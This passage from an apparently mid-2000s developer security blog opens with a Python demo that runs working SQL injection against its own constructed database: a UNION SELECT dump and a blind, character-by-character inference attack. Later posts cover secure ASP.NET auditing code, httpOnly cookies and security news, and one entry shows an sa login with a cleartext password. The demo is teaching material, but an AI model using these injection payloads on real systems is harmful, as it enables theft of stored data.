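To make the three classes concrete, here is a small added example in Python (mine, not from the post or from the paper) that simulates both sides: a deliberately injectable application backed by an in-memory SQLite database with constructed data, an inband UNION SELECT against a page that echoes results, and a pure inference attack against a page that only ever answers "found" or "not found". The SQLite function names (unicode, substr, length) are assumptions of this demo; on SQL Server the same probes would use ASCII, SUBSTRING and LEN.

```python
import sqlite3


def build_demo_db():
    """Constructed demo data (not from the paper): an in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (name, secret) VALUES (?, ?)",
                     [("alice", "s3cr3t!"), ("bob", "hunter2")])
    return conn


# --- the vulnerable application side (string concatenation is the bug) -------

def search_users(conn, term):
    """Inband case: a search page that echoes matching names to the client."""
    sql = "SELECT name FROM users WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def user_exists(conn, name):
    """Inference case: a page that reveals only 'found' or 'not found'."""
    sql = "SELECT 1 FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


# --- the attacker side ---------------------------------------------------------

def inband_dump(conn):
    """UNION SELECT: the secrets travel back over the same channel the page
    already uses for its results. The trailing -- comments out the closing quote."""
    return sorted(search_users(conn, "zzz%' UNION SELECT secret FROM users --"))


def infer_secret(conn, target, max_len=64):
    """No data is ever returned; each character of the target's secret is
    recovered by binary-searching its code point with yes/no questions.
    The search space is ASCII (an assumption of this demo)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the secret has no character at this position.
        if not user_exists(conn, f"{target}' AND length(secret) >= {pos} AND '1'='1"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{target}' AND unicode(substr(secret,{pos},1)) > {mid} AND '1'='1"
            if user_exists(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_demo_db()
    print("inband  :", inband_dump(db))
    print("inferred:", infer_secret(db, "alice"))
```

The inband variant needs one request; the inference variant costs roughly eight requests per character (one length probe plus seven for the binary search), which is why a burst of near-identical requests differing only in a number is worth a detection rule even when nothing sensitive ever shows up in a response.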

Categories: Security | SQL Server
Wednesday, 05 October 2005 23:36:51 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 16 September 2005

The day started out with one of those famous spoof videos - this time about a "variation" of Windows error reporting, dubbed WE-SYP (we share your pain). Error reporting tied to a - let's call it - "multimedia" chair. Fun to watch.

Right after that, Bob Muglia showed off what we can expect from Windows Server in the next couple of years. Windows Server 2003 Compute Cluster Solution was demoed together with Excel Services - impressive. TxF (transactional NTFS) wasn't any less exciting, just like the identity solutions - and, of course, IIS 7.0. We got the bits for the latter today.

Sessions I attended today:

  • Windows Communications Foundation ("Indigo"): A Deep Dive into Best Practices Using the Windows Communications Foundation
  • ASP.NET: Future Directions for Developing Rich Web Applications with Atlas (Part 2)
  • ASP.NET: A Sneak Peek at Future Directions in Web Development and Designer Tools
  • Windows Vista & "Longhorn" Server: Under the Hood of the Operating System—System Internals and Your Application
  • ASP.NET: Deep Dive into the ObjectDataSource Control

The under-the-hood session for Longhorn server had one interesting tidbit - they aim to require mandatory signing for kernel mode drivers on x64 platforms - bye bye kernel rootkits! (At least the unsigned ones: a signed but vulnerable driver still offers a way into the kernel, so this raises the bar rather than closing the door.)

Bradley Millington quite overshot his allocated timeslot for the ObjectDataSource control, but he covered interesting areas: filtering and master/detail, custom sorting and paging, updates, inserts and deletes, as well as transactions and caching. Seeing realistic examples is a welcome change. A good place for you to start: the Advanced Data Scenarios section of the Quickstarts. (Note: those links point to http://beta.asp.net, and I don't think that Whidbey docs will be up and running there forever, given that "Orcas" starts appearing on the horizon).

Categories: 2 Ohhhh | ASP.NET | IIS | Security | this | Training and Conferences
Friday, 16 September 2005 05:20:36 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 13 September 2005

Today was preconference day at the PDC. I opted for Keith Brown's talk Attack and Defense: The Art of Secure Coding. Of course it contained a couple of well-known "friends" such as SQL Injection, but there were other interesting tidbits that made it worthwhile.

Speaking of which, including (four) product demos was a good idea, here is the list of products in order of presentation:

Definitely worth checking out, might save a headache or two when using those tools.

Keith also briefly discussed SDL (Security Development Lifecycle) vs Security Engineering Guidelines. You could also cast that as ideal world (ie lots of cash for security available) vs real world. Therefore: go for patterns & practices stuff to make your projects secure.

Categories: .NET | Security | this | Training and Conferences
Tuesday, 13 September 2005 03:20:11 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 23 August 2005

I admit that I am not the sort of person who likes to go through long-winded installation instructions. However, I am willing to go to great lengths when it comes to security - still with certain limits though. And I hit such a brick wall today: trying to secure Subversion. From the documentation, I knew that the recommended path was SSH, so I set out to find out how to get this up and running on my Windows box.

Owning the black sock in Google fu, I came up with various articles, the most helpful being SVN+SSH+public key authentication on Windows Box as server. Most helpful because after reading the aforementioned recipe plus Subversion / TortoiseSVN SSH HowTo, I decided to scratch my efforts. Why?

For starters, I am not a big fan of Cygwin. That's just personal mischief of a Windows guy, I can swallow my pride when the tools that depend on it provide merit. What's more of a problem for me is installing a service for adding security to another service - especially if I need that new service just for the "security purpose", and not the other bells and whistles it can provide (plus the security issues that might be hidden in those unused parts). Call me paranoid, but I simply like to reduce "moving parts" in my setups, because: What's worse than malicious traffic? Right, encrypted malicious traffic.

Secondly, do you think - honestly - that developers love to jump through hoops to get access to the repository? (I am referring to the client side of things on Windows) Not really. From the top of my head, I fall short of naming a single developer I personally know that would love to follow those steps. But every single one of them would be more than willing to just replace svn:// for svns:// when accessing a repository.

Conclusion: yes, I am whining about the usability of an open source project. As I am participating on one myself, you very well can spare me the "usual" arguments of do-it-yourself-because-the-sourcecode-is-available-anyways. This is a rant. I want to be unreasonable. But it sure would be nice if security was in the box. Especially nowadays.

Categories: Administration | Security | Subversion
Tuesday, 23 August 2005 16:00:57 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 18 August 2005

This is not just a plain announcement of the revamped German MSDN Developer Center - Sicherheit, it also contains some back patting for myself, so be warned.

My part in this relaunch was to go over "Basiswissen: Know How für Einsteiger" (~ Security [1..4]01) and pull together useful content in the security area applicable to developers. The result? A mix of books (some of the very best information still is only available in dead tree rendition), online articles and more. Everything is nicely presented in a box in the middle of the page:

Grundlagen (Foundation), .NET Framework Sicherheit (.NET Fx Security), Web Services (I proposed "Web Services & Distributed Technologies"), ASP.NET and Kryptographie (cryptography, my pet peeve) are the sections that I contributed. Judging from a brief perusal, it seems that mostly only my content is in there. So Michael and Uwe will accept my apologies for me claiming those to be "my" sections.

Categories: .NET | Newsbites | Security | this
Thursday, 18 August 2005 13:16:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

As a long-time subscriber as well as regular reader of the Bugtraq mailing list, I saw Gregory's post on decrypting MSN Messenger passwords. Because that one really piqued my interest, I immediately headed over to infoGreG and grabbed the source code, put it into a VS.NET 2003 C++ project, fixed a couple of compiler switches, and et voila - it works as advertised!

Categories: Security | this | Use the source Luke
Thursday, 18 August 2005 08:06:45 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]

 



#  Tuesday, 16 August 2005

From the summary of this security practice: This module presents a set of consolidated practices designed to address ASP.NET version 2.0 security issues. The answers and recommendations presented in this module are tight distillations designed to supplement the companion modules and additional guidance. The practices are organized by various categories that represent those areas where mistakes are most often made.

Security Practices: ASP.NET 2.0 Security Practices at a Glance

Categories: 2 Ohhhh | ASP.NET | Security
Tuesday, 16 August 2005 10:01:40 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 11 August 2005
Read about this article on Bruce Schneier's blog. Interesting and fun read, especially early in the morning. Assembler knowledge a plus, but not a requirement.
Categories: Security
Thursday, 11 August 2005 08:33:07 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 02 August 2005

On 12th of August, the Austrian .NET community is hosting a one-day conference on security, targeted at developers (no surprise here). The topics for NCC 2005 A include:

  • Threat Modeling
  • What's new in .NET 2.0 Security
  • What's new in SQL Server 2005 Security
  • What's new in Windows Vista Security

Quite a nice line-up I'd say. This event is supported by Microsoft Austria, so attending this event is free, except for your time, but I am sure security does warrant a day of your time! Sign up here

Tuesday, 02 August 2005 15:27:45 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 26 July 2005
The registration for this year's .NET Community Conference in Austria went live today (register here, it's free). The thread of this year's edition is security: threat modeling, .NET 2.0 security features, SQL Server 2005 security and more. Definitely worth your time - if you have time to spare, join us on 12th of August in Vienna!
Tuesday, 26 July 2005 15:37:13 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]

 



#  Monday, 25 July 2005

On Friday, it was my turn as speaker at the Community Bootcamp 2005 aka CBC05. One of the topics at hand was "The Provider Model", with a focus on Membership providers. Those are the ones most likely to be extended or written from scratch, and we did an exercise in that very area: extend the SqlMembershipProvider to audit successful and failed logins, similar to the lastlog/faillog records on *nix. The solution I present today is a streamlined version of the one programmed by Alexander Schoeppl, one of the attendees.

Step 1: Create the table

CREATE TABLE [dbo].[myLoginAuditing](
 [username] [varchar](255) NOT NULL PRIMARY KEY,  -- one audit row per user
 [numberofSuccessfulLogins] [int] NOT NULL,
 [numberofFailedLogins] [int] NOT NULL,
 [lastFailedLogin] [datetime] NULL,               -- NULL until the first failure
 [lastFailedLoginIP] [varchar](45) NULL)          -- 45: room for an IPv6 address, 15 is IPv4 only

Step 2: Create the stored procedure

CREATE PROCEDURE dbo.myLogUserVisit (
  @username          varchar(255),
  @success           int,
  @lastFailedLoginIP varchar(45))
AS
  SET NOCOUNT ON
  BEGIN TRANSACTION
  -- UPDLOCK/HOLDLOCK serialises two concurrent "first" logins of the same user;
  -- without it both could take the INSERT branch and end up with two rows
  -- (or, with the primary key above, with a failed second insert).
  IF EXISTS (SELECT 1 FROM dbo.myLoginAuditing WITH (UPDLOCK, HOLDLOCK)
             WHERE username = @username)
  BEGIN
    IF (@success = 1)
      UPDATE dbo.myLoginAuditing
         SET numberofSuccessfulLogins = numberofSuccessfulLogins + 1
       WHERE username = @username
    ELSE
      UPDATE dbo.myLoginAuditing
         SET numberofFailedLogins = numberofFailedLogins + 1,
             lastFailedLogin      = GETDATE(),
             lastFailedLoginIP    = @lastFailedLoginIP
       WHERE username = @username
  END
  ELSE
  BEGIN
    -- lastFailedLogin/IP stay NULL until the first failure; no locale-dependent
    -- date literal such as '01.01.1900' is needed.
    IF (@success = 1)
      INSERT INTO dbo.myLoginAuditing
        (username, numberofSuccessfulLogins, numberofFailedLogins,
         lastFailedLogin, lastFailedLoginIP)
      VALUES (@username, 1, 0, NULL, NULL)
    ELSE
      INSERT INTO dbo.myLoginAuditing
        (username, numberofSuccessfulLogins, numberofFailedLogins,
         lastFailedLogin, lastFailedLoginIP)
      VALUES (@username, 0, 1, GETDATE(), @lastFailedLoginIP)
  END
  COMMIT TRANSACTION

Alexander did a smart thing - before writing his own, he looked at the various aspnet_* stored procedures (the ones aspnet_regsql installs for the built-in providers).

Step 3: Write the Membership provider

The class skeleton looks like this (the using directives are the ones the complete class needs):

using System;
using System.Collections.Specialized;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.Security;

public class MyMembershipProvider : SqlMembershipProvider
{
    public override bool ValidateUser(string username, string password)
    {
    }

    public override void Initialize(string name, NameValueCollection config)
    {
    }

    // Returns the MyMembershipUser (with its FullName property) that the page
    // further down casts to; its body is not listed in this post.
    public override MembershipUser GetUser(string username, bool userIsOnline)
    {
    }
}

Initialize is the easy but essential part - we need the connection string name for later. It has to be read before calling base.Initialize, because the base provider removes the attributes it has consumed from config:

private string connectionStringName;

public override void Initialize(string name, System.Collections.Specialized.NameValueCollection config)
{
    // Take our copy first: SqlMembershipProvider.Initialize consumes (removes)
    // this entry and throws a ProviderException if it is missing, so there is
    // no need to validate it here again.
    connectionStringName = config["connectionStringName"];
    base.Initialize(name, config);
}

Now we can validate the user - well, the base class does that (password hashing, and locking the account after too many bad attempts); we only do the auditing part. Note that failed attempts are recorded for usernames that do not exist at all, which is what you want for spotting guessing attacks, but it means attacker-chosen names land in the table:

public override bool ValidateUser(string username, string password)
{
    // HttpContext.Current is null when the provider is called outside a
    // request (unit tests, services), so never dereference it blindly.
    HttpContext context = HttpContext.Current;
    if (context != null) context.Trace.Write("ValidateUser:entry");

    // The base class does the real work; we only audit the outcome.
    bool bSuccess = base.ValidateUser(username, password);

    string connectionString =
        ConfigurationManager.ConnectionStrings[connectionStringName].ConnectionString;
    string clientIP = (context != null) ? context.Request.UserHostAddress : String.Empty;

    // 'using' returns the connection to the pool even if the audit throws.
    using (SqlConnection conn = new SqlConnection(connectionString))
    using (SqlCommand cmd = new SqlCommand("dbo.myLogUserVisit", conn))
    {
        cmd.CommandType = CommandType.StoredProcedure;
        // Sizes match the table columns: SqlClient sends at most Size characters,
        // so an over-long (attacker-chosen) username is cut instead of turning
        // the login into a SqlException about truncated data.
        cmd.Parameters.Add("@username", SqlDbType.VarChar, 255).Value = username ?? String.Empty;
        cmd.Parameters.Add("@success", SqlDbType.Int).Value = bSuccess ? 1 : 0;
        cmd.Parameters.Add("@lastFailedLoginIP", SqlDbType.VarChar, 45).Value = clientIP;

        conn.Open();
        cmd.ExecuteNonQuery();
    }

    if (context != null) context.Trace.Write("ValidateUser:exit");

    return bSuccess;
}

Step 4: Set it up - web.config

  <appSettings/>
  <connectionStrings>
    <add name="MyNWind" connectionString="Data Source=cbc05vpc\cbc05;Initial Catalog=Northwind;User=sa;Password=P@ssw0rd"/>
  </connectionStrings>
 
  <system.web>
    <membership defaultProvider="SuperDuperMSProv">
      <providers>
        <clear/>
        <add name="SuperDuperMSProv" connectionStringName="MyNWind" type="MyMembershipProvider"/>
      </providers>
    </membership>

Two things about that connection string are fine for a bootcamp VPC only: the login is sa, and the password sits in cleartext in web.config. In production, use a SQL login that is merely a member of the aspnet_Membership_FullAccess role (created by aspnet_regsql) with EXECUTE on myLogUserVisit and SELECT on myLoginAuditing, and encrypt the section with aspnet_regiis -pe "connectionStrings" -app "/YourApp".

Step 5: View the auditing information - default.aspx.cs

The final "UI" looks like this:

The source code is rather simple:

protected void Page_Load(object sender, EventArgs e)
{
    // Membership.GetUser() is null for anonymous requests; this page is meant
    // to be reached only after a Forms Authentication login.
    MyMembershipUser currentUser = (MyMembershipUser)Membership.GetUser();
    if (currentUser == null)
    {
        FormsAuthentication.RedirectToLoginPage();
        return;
    }

    // Label does not encode its Text; FullName is profile data the user may
    // have typed himself, so encode it instead of reflecting it raw.
    Label1.Text = HttpUtility.HtmlEncode(currentUser.FullName);
    string lcConnection = ConfigurationManager.ConnectionStrings["MyNWind"].ConnectionString;

    using (SqlConnection conn = new SqlConnection(lcConnection))
    using (SqlCommand cmd = new SqlCommand(
        "SELECT username, numberofSuccessfulLogins, numberofFailedLogins, " +
        "lastFailedLogin, lastFailedLoginIP FROM dbo.myLoginAuditing " +
        "WHERE username = @username", conn))
    {
        // Parameter name spelled exactly as in the SQL text (matters on
        // case-sensitive collations).
        cmd.Parameters.Add("@username", SqlDbType.VarChar, 255).Value = currentUser.UserName;

        conn.Open();
        using (SqlDataReader reader = cmd.ExecuteReader())
        {
            GridView1.DataSource = reader;
            GridView1.DataBind();
        }
    }
}

Done. By the way, did you notice something? Right! Alexander never fell into the trap of SQL Injection: every value that originates from the user travels to SQL Server as a parameter, never as part of the command text.

ExtendingMembershipProviderDemo.zip (5.64 KB)

Categories: 2 Ohhhh | ASP.NET | Community | Security
Monday, 25 July 2005 19:46:16 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 13 July 2005
Yet another security book is coming: The 19 Deadly Sins of Software Security. You can read about its contents on Michael Howard's blog here. I am not yet done with Protect Your Windows Network : From Perimeter to Data by Jesper Johansson and Steve Riley (great site, btw). I definitely do recommend this book to everyone interested in security!
Categories: Books | Security
Wednesday, 13 July 2005 08:16:30 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 12 July 2005
Order a couple of their security posters and place them at strategic locations in your company. Maybe someone should buy this poster for the UK MOD - they keep having their notebooks stolen.
Categories: Security
Tuesday, 12 July 2005 22:05:59 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

Check out the article 10 Immutable Laws of Security on TechNet. A couple of those should get you thinking - I especially like #6.
Categories: Administration | Security
Tuesday, 12 July 2005 21:59:45 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Monday, 11 July 2005
Mark Russinovich (his blog is highly recommended) commented on that book during one of his TechEd Europe talks. The book is written (including) by the guy running rootkit.com, famous for the Hacker Defender rootkit for Windows. Looks like there's yet another book to be added to my backlog for reading this summer <g />.
Categories: Books | Security | this
Monday, 11 July 2005 15:01:12 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 08 July 2005
I'm sitting right now in that session. The speaker is just demoing yet another example which has a SQL Injection vulnerability! The killer: a script callback that uses the params unvetted to dynamically build a SQL string. MS definitely should vet the demos for security problems.
Categories: 2 Ohhhh | ASP.NET | Security | this
Friday, 08 July 2005 12:31:39 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]

 



#  Saturday, 02 July 2005
The new version of MBSA is finally available. Go get it here.
Categories: Cool Download | Security
Saturday, 02 July 2005 08:19:16 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 18 May 2005
The Securing Wireless LANs with PEAP and Passwords solution guide is designed to help small- and medium-sized organizations protect their wireless local area networks (LANs). This prescriptive guidance will assist you in planning, deploying, testing, and managing a wireless LAN security infrastructure using Microsoft Windows XP, Windows Server 2003, and Pocket PC 2003. The guide is a companion to the earlier solution guide Securing Wireless LANs – a Certificate Services Solution. However, this updated guide uses passwords to authenticate users and computers to the LAN instead of digital certificates. Download
Categories: Administration | Security
Wednesday, 18 May 2005 12:58:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

Guidance for threat modeling Web applications has been released on the patterns&practices site. A must-read for every Web developer.
Categories: Security
Wednesday, 18 May 2005 10:02:27 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 12 April 2005

Just seen on NTBugtraq, quote from the Web site: SQLRecon performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. Due to the proliferation of personal firewalls, inconsistent network library configurations, and multiple-instance support, SQL Server installations are becoming increasingly difficult to discover, assess, and maintain.

SQLRecon is designed to remedy this problem by combining all known means of SQL Server/MSDE discovery into a single tool which can be used to ferret out servers you never knew existed on your network so you can properly secure them.

Didn't yet have time to try SQLRecon myself, but sure will.

Categories: Cool Download | Security | SQL Server
Tuesday, 12 April 2005 17:08:54 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 06 April 2005
This site contains links to a variety of resources on IPsec and its support in Windows Server 2003.
Categories: Administration | Security
Wednesday, 06 April 2005 12:00:00 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Saturday, 05 March 2005

After dinner yesterday, we decided to go to B&N which happened to be nearby. Well, I left with two more books to read: The .NET Developer's Guide to Windows Security and Open Source .NET Development: Programming with NAnt, NUnit, NDoc, and More. The former is by Keith Brown, and contains all those things you usually don't find C# samples for easily: for example, how to modify ACLs - and much, much more.

The second one (by Brian Nantz) on OS tools for .NET development will be a reference for me on the various tools that we do use today, as well as others that we are likely to evaluate. It also contains a brief section (roughly a page) on #develop, which I happen to be the PM for. I would like to set the record straight on a couple of things though:

  • #ziplib is only used to zip the help index XML files
  • #cvslib hasn't been a part of the distribution for a couple of years now. However, it played an extremely vital role in #develop's gestation: the GUI for #cvslib was a prototype for the addin system we later used in #develop.
  • Magic Library - in May last year (Fidalgo Beta 1), it was entirely replaced by the DockPanel Suite. Before that, we already had replaced portions of the Magic widgets with Lutz' CommandBar for .NET.
Categories: Books | Security | this | Use the source Luke
Saturday, 05 March 2005 17:32:08 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Tuesday, 01 March 2005

Note to self: need to install SP1 for ISA 2004. From the download page:

ISA Server 2004 Standard Edition SP1 can be installed directly on computers running ISA Server 2004 Standard edition, and includes:

  • All software updates issued since ISA Server was released to manufacturing.
  • Fixes for common issues reported by customers through Microsoft Product Support Services (PSS).
  • Enhanced stability of the ISA Server services and administration tool in a number of scenarios.

Also check out the readme.

Categories: Security | this
Tuesday, 01 March 2005 07:14:15 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Sunday, 27 February 2005
Categories: .NET | ASP.NET | Security
Sunday, 27 February 2005 02:22:24 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 25 February 2005
NNNNNOOOOooooo......! reminded me of one thing I still needed to do to speed up XP on my new notebook: regsvr32 /u zipfldr.dll.
Categories: Administration | Security | this
Friday, 25 February 2005 02:51:38 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Thursday, 24 February 2005

In the article The 80/20 Rule for Web Application Security, one of the proposed security solutions for protecting sensitive cookies is adding the httpOnly flag. A cookie carrying this attribute is still sent with every request, but a browser that honours the flag (Internet Explorer 6 SP1 was the first) refuses to expose it to client-side script through document.cookie. That does not fix a cross-site scripting hole, but it takes session hijacking by cookie theft off the table for the attacker who finds one.

All you have to do in ASP.NET 2.0 to take advantage of this security feature is to add the httpCookies element with the httpOnlyCookies attribute set to true to web.config:

<?xml version="1.0" encoding="utf-8"?>
<configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">
    <system.web>
        <httpCookies httpOnlyCookies="true"/>
    </system.web>
</configuration>

That's it - the flag is now added to every cookie the application sets, but you are still free to override this on a per-cookie basis through the HttpCookie.HttpOnly property.
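One way to confirm that the setting actually reached the browser is to look at the Set-Cookie headers the server emits. The following added Python example (not part of the post) parses Set-Cookie values and reports, per cookie, which of the HttpOnly and Secure flags are missing; Secure goes beyond what the article above discusses, but the two checks belong together for a session cookie on an SSL site (for the forms authentication cookie, requireSSL="true" on the forms element sets it). The sample headers are constructed, not captured from a real server.

```python
# Flags a sensitive cookie should carry: HttpOnly keeps it away from script,
# Secure keeps it off cleartext connections.
REQUIRED_FLAGS = ("httponly", "secure")


def parse_set_cookie(header_value):
    """Split one Set-Cookie header value into (name, {attribute: value}).
    Attribute names are matched case-insensitively, as browsers do."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        if key.strip():
            attrs[key.strip().lower()] = value.strip()
    return name, attrs


def audit_cookies(set_cookie_headers, sensitive=()):
    """Return {cookie name: [missing flags]} for the cookies listed in 'sensitive'
    (or for every cookie when 'sensitive' is empty). Cookies that carry both
    flags do not show up in the result."""
    findings = {}
    for header in set_cookie_headers:
        name, attrs = parse_set_cookie(header)
        if sensitive and name not in sensitive:
            continue
        missing = [flag for flag in REQUIRED_FLAGS if flag not in attrs]
        if missing:
            findings[name] = missing
    return findings


# Constructed sample response headers (not captured from a real server): the
# session cookie is HttpOnly but not Secure, the other two carry neither flag.
SAMPLE_HEADERS = [
    "ASP.NET_SessionId=abc123; path=/; HttpOnly",
    ".ASPXAUTH=0123456789ABCDEF; expires=Mon, 01-Jan-2007 00:00:00 GMT; path=/",
    "prefs=lang%3Den; expires=Mon, 01-Jan-2007 00:00:00 GMT; path=/",
]

if __name__ == "__main__":
    for cookie, missing in audit_cookies(SAMPLE_HEADERS).items():
        print(f"{cookie}: missing {', '.join(missing)}")
```

Feed it the raw Set-Cookie lines from a proxy or packet capture of a login response; if the session and authentication cookies still come back without HttpOnly after the web.config change, the flag is being cleared per cookie somewhere in code.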

Categories: 2 Ohhhh | ASP.NET | Security
Thursday, 24 February 2005 06:01:40 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Tuesday, 01 February 2005

The 80/20 Rule for Web Application Security is an article by Jeremiah Grossman, focused on increasing the security without touching the source code. The article identifies the "vital few" security solutions essential to protecting a website:

  • Default server error messages
  • Remove or protect hidden files and directories
  • Web server security add-ons
  • Add httpOnly flag to sensitive cookies
Categories: Administration | IIS | Security
Tuesday, 01 February 2005 11:01:07 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 

A non-programming security topic centered around securing your wireless LAN. This white paper contains instructions to obtain and install a certificate for PEAP-MS-CHAP v2 wireless authentication on the IAS (RADIUS) server and how to set up the clients to trust this certificate.
Categories: Administration | Security
Tuesday, 01 February 2005 08:19:09 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 05 January 2005

TrueCrypt is a free open-source disk encryption software for Windows 2000 through 2003 (and this indeed includes XP). You can create virtual disks, which, as the application name implies, are encrypted: mount with the correct password - you magically see another volume. Don't have the right password? Enjoy looking at gibberish. A recommended application for laptop users; especially the British public (and secret) services should take note, as they tend to lose quite a few laptops per year.

The second application is KeePass, which is nothing more or less than a nice password safe which keeps your secrets locked away (even from you, should you forget the master key). Cool features: it simply runs (no installation required), has a password generator, and supports importing.

Wednesday, 05 January 2005 14:55:28 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 08 December 2004

Not strictly a programming security topic, but useful nonetheless: Attack and penetration testing is a set of techniques and methodologies to test compliance to security policies, and to detect previously unknown vulnerabilities. The overall goal is to limit the points of exposure and to restrict the ability of unknown attackers to gain entry. However, developing an effective attack and penetration testing team presents unique management challenges. This discussion gives some best practice advice and lessons learned from the Microsoft IT experience building and operating an internal attack and penetration testing team. Download

Categories: Administration | Security
Wednesday, 08 December 2004 11:16:25 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 06 December 2004

There is a new hands-on lab for Web Services Enhancements 2.0: Learn how to secure Web services without writing code. Sample code is provided for both C# and VB.NET, so it should fit almost everyone.

Categories: .NET | ASP.NET | Security
Monday, 06 December 2004 18:57:51 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 03 December 2004

Using WSE 2.0? Get SP2. Don't know what WSE is? Here is a quick overview from the download page:

WSE 2.0 SP2 simplifies the development and deployment of secure Web services by enabling developers and administrators to more easily apply security policies on Web services running on the .NET Framework. Using WSE, Web services communication can be signed and encrypted using Kerberos tickets, X.509 certificates, username/password credentials, and other custom binary and XML-based security tokens. In addition, an enhanced security model provides a policy-driven foundation for securing Web services across trust domains. WSE also supports the ability to establish a trust-issuing service for retrieval and validation of security tokens, as well as the ability to establish more efficient long-running secure communication via secure conversations.

Categories: ASP.NET | Security | Visual Studio
Friday, 03 December 2004 10:28:46 (W. Europe Standard Time, UTC+01:00)  #    Comments [2]

 



#  Wednesday, 24 November 2004

From the abstract: Seth Fogie presents the latest in our series of security audio sessions. Mr Fogie discusses all the major security issues that are affecting Windows Mobile Pocket PC devices. Some of the topics covered include:

  • Worms, trojans and backdoors
  • Insecurities in wireless connectivity
  • Denial of Service attacks
  • Specific problems (ActiveSync, autorun SD/CF cards, buffer overflows)
  • PDA device as an attack platform
  • Tips on securing your PDAs.

The audio session is 13:58 minutes long (Flash required).

Wednesday, 24 November 2004 10:22:36 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 22 November 2004

Michael Howard did it again in his latest Writing Secure Code column: how you can run as an administrator and access Internet data safely by dropping unnecessary administrative privileges when using any tool to access the Internet (article on MSDN Security Developer Center). Started using the DropMyRights application immediately on my email applications (yes, I'm one of those devs who does run with administrative privileges by default). Really painless. And can save a headache or two.

Monday, 22 November 2004 22:07:49 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Sunday, 24 October 2004

The November issue of MSDN Magazine is completely about security: attack surface, application lockdown, cryptography, trustworthy code, intrusion prevention and much more. If you ain't already a subscriber, make sure you grab at least this issue at your local newsstand.

Categories: Security
Sunday, 24 October 2004 10:54:10 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]

 



#  Monday, 18 October 2004

The Security Risk Management Guide helps customers of all types plan, build, and maintain a successful security risk management program. The guide explains how to conduct each phase of a four-phase risk management program and how to build an ongoing process to measure and drive security risks to an acceptable level. This guide is technology agnostic and references many industry accepted standards for managing security risk. Download

 

Categories: Security
Monday, 18 October 2004 11:48:37 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Sunday, 17 October 2004

Michael Howard has an interesting blog entry on the number of advisories for IIS 6 versus the number of advisories for Apache 2.0.x (advisories that are security-relevant, in case you are wondering). This doesn't make Apache look that good after all.

Categories: IIS | Security
Sunday, 17 October 2004 19:10:02 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Saturday, 16 October 2004

Brian Goldfarb has the details in his blog on Making the ValidatePath HTTP Module easier to deploy. (remember, the canonicalization issue with ASP.NET)

Categories: ASP.NET | Security
Saturday, 16 October 2004 11:30:08 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 15 October 2004

Another MSR (Cambridge) project: The goal of the Samoa Project is to exploit recent theoretical advances in the analysis of security protocols in the practical setting of XML web services. Some early outcomes of this research include an implementation of declarative security attributes for web services and the design of a logic-based approach to checking SOAP-based protocols.

Even if this doesn't sound interesting to you, the site sports a really great resources section with lots of article links, security topics, bloggers and columnists, resource hubs and more. If you are working with Web Services, check this site out!

Categories: .NET | MSR | Security
Friday, 15 October 2004 10:04:38 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 08 October 2004

